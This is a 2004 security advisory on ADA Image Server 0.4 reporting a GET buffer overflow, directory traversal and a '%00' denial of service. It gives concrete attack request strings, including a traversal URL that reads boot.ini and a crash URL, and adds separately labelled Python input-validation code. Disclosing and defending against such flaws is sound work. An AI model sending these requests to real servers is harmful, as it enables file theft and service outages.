[NT] ADA Image Server (ImgSvr) Multiple Vulnerabilities

From: SecuriTeam (support_at_securiteam.com)
Date: 04/15/04

    To: list@securiteam.com
    Date: 15 Apr 2004 17:07:04 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      ADA Image Server (ImgSvr) Multiple Vulnerabilities
    ------------------------------------------------------------------------

    SUMMARY

    ADA Image Server (http://sourceforge.net/projects/adaimgsvr/) is "an
    embedded web server that is specialized in photo album publishing. This
    Image server provides an HTTP based access to image content. It generate
    dynamic pages from a standard directory based hierarchy, manage
    thumbnails, metadatas". Multiple security vulnerabilities have been found
    in the product: a buffer overflow in the handling of GET requests,
    directory traversal vulnerabilities, and DoS vulnerabilities.

    DETAILS

    Vulnerable Systems:
     * ADA Image Server (ImgSvr) version 0.4

    Buffer Overflow in GET / request:
    ADA Image Server contains a buffer overflow that is triggered whenever an
    attacker sends a GET request followed by 2,112 characters. An attacker may
    exploit this vulnerability to crash the web server or even execute
    arbitrary code:
    Get /[2,112 chars] http/1.0

    Directory Traversal Vulnerabilities:
    Requests containing the pattern "%2f%2e%2e%2f" are not properly checked
    for directory traversal. Using this pattern, an attacker can download any
    file that resides outside the bounding HTML root directory:
    http://[host]:1234/%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2fboot.ini

    Or view a directory's contents:
    http://[host]:1234/%2f%2e%2e%2f%2f%2e%2e%2f/

    Denial of Service:
    By supplying a "%00" in the URL, a remote user can crash the server using
    the following request:
    http://127.0.0.1:1234/%00/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe
    /imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe
    /imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/
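
As an added example (not part of the advisory and not ImgSvr's own code), the Python below shows the request-target checks whose absence the three issues above point to: a length bound, percent-decoding before validation, NUL rejection, and confinement to the document root. The length limit, document root, function names and sample targets are assumptions made for illustration.

```python
import posixpath
from urllib.parse import unquote

MAX_TARGET_LEN = 1024    # assumed limit, well below the 2,112 characters in the advisory
DOC_ROOT = "/srv/album"  # hypothetical document root

class RejectedRequest(Exception):
    """Raised with a short reason when a request target is refused."""

def resolve_target(raw_target: str, doc_root: str = DOC_ROOT) -> str:
    """Map a raw request target to a path under doc_root, or raise."""
    # 1. Bound the length before any further parsing or copying.
    if len(raw_target) > MAX_TARGET_LEN:
        raise RejectedRequest("target too long")
    # 2. Decode percent-escapes first, so %2f and %2e are checked as '/' and '.'.
    text = unquote(raw_target.split("?", 1)[0])
    # 3. A NUL character (%00) never belongs in a file name.
    if "\x00" in text:
        raise RejectedRequest("NUL byte in path")
    # 4. Treat '\' like '/' (Windows host) and refuse any '..' segment.
    segments = [s for s in text.replace("\\", "/").split("/") if s not in ("", ".")]
    if ".." in segments:
        raise RejectedRequest("parent-directory segment")
    # 5. Join, then confirm the result is still inside the root (defence in depth).
    root = posixpath.normpath(doc_root)
    full = posixpath.normpath(posixpath.join(root, *segments))
    if posixpath.commonpath([root, full]) != root:
        raise RejectedRequest("escapes document root")
    return full

def verdict(raw_target: str) -> str:
    """Return the resolved path, or 'rejected: <reason>'."""
    try:
        return resolve_target(raw_target)
    except RejectedRequest as exc:
        return f"rejected: {exc}"

# Constructed request targets modelled on the three patterns in the advisory.
SAMPLES = [
    "/holiday/beach.jpg",
    "/%2f%2e%2e%2f%2f%2e%2e%2fboot.ini",
    "/%00/imgsvr.exe/imgsvr.exe",
    "/" + "A" * 2112,
]

if __name__ == "__main__":
    for target in SAMPLES:
        print(target[:40], "->", verdict(target))
```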

    ADDITIONAL INFORMATION

    The information has been provided by dr_insane
    (dr_insane@pathfinder.gr).

    ========================================


    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

